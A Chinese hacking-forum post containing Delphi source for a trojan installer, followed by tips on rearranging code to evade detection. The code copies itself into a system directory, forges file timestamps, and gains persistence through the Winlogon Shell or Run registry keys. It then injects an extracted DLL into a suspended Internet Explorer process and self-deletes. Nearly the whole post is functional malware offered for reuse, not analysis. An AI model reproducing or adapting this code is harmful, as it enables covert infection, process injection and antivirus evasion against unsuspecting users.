TAMAMA

[s:92]  [s:92]  [s:92]
无语....

procedure fuckmain;   //把主代码写成一个过程...
var
isSetup: Bool;
SetupPathName: string;
begin
{ ExeFiles := pchar(DeCryptStr(ExeFiles,'bwindlovexiaohan'));
DLLFiles := PChar(DeCryptStr(DLLFiles,'bwindlovexiaohan'));
IEFiles := PChar(DeCryptStr(IEFiles,'bwindlovexiaohan'));    }

SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
  try
   if FileExists(SetupPathName) then
   begin
   FilesetAttr(SetupPathName, 0);
   DeleteFile(SetupPathName);
   if FileExists(SetupPathName) then
   begin
    Halt;
    Exit;
   end;
   end;
   CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
   SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
   SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
   SetFileTimesHelper(SetupPathName,Now-1000,ftCreation);
  except
  end;
  isSetup := True;
  if judgesys = 3 then
  begin
   Reg.AddValue(HKEY_LOCAL_MACHINE, &#39;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&#39;, &#39;Shell&#39;, pchar(&#39;Explorer.exe &#39;+Gesy+ ExeFiles), 1);
  end
  else
  begin
   Reg.AddValue(HKEY_CURRENT_USER, &#39;SoftWare\Microsoft\Windows\CurrentVersion\Run&#39;, ExeFiles, pchar(Gesy + ExeFiles), 1);
  end;
end;
if FindWindow(&#39;Rejoice_3.2&#39;, &#39;Windows IDE&#39;) = 0 then
begin
  DllAllpath := Gesy + DLLFiles;
  try
   FilesetAttr(DllAllpath, 0);
   DeleteFile(DllAllpath); {删除现有的DLL文件}
  except
  end;
  if FileExists(DllAllpath) then {如果删除失败，则改名}
  begin
   DllAllpath := RandomFilename(DllAllpath);
   SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
   SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
   SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
  end;
  if ExtractRes(&#39;dllfile&#39;, &#39;mydll&#39;, DllAllpath) then {生成新的DLL插入文件}
  begin
  if IEFiles = &#39;IEXPLORE.EXE&#39; then
  CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
   PID := GetProcessID(IEFiles);
   Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}
   FilesetAttr(DllAllpath, 0);
   SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
   SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
   SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
   InjectLibrary(Process, Pchar(DllAllpath));
  end;
end;
if isSetup then
Begin
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
ExtDelMe;
end;
Halt;
end;

begin
  fuckmain;  //调用该过程...
end.


或者建立另一个单元文件,把上面调用到的一些过程和函数打乱顺序放进去,然后在头部调用该单元文件就OK了.. [s:73]
帖子21 精华0 积分76 阅读权限40 在线时间23 小时 注册时间2006-8-15 最后登录2007-6-7 查看详细资料引用 报告 回复 TOP

asm
运维管理组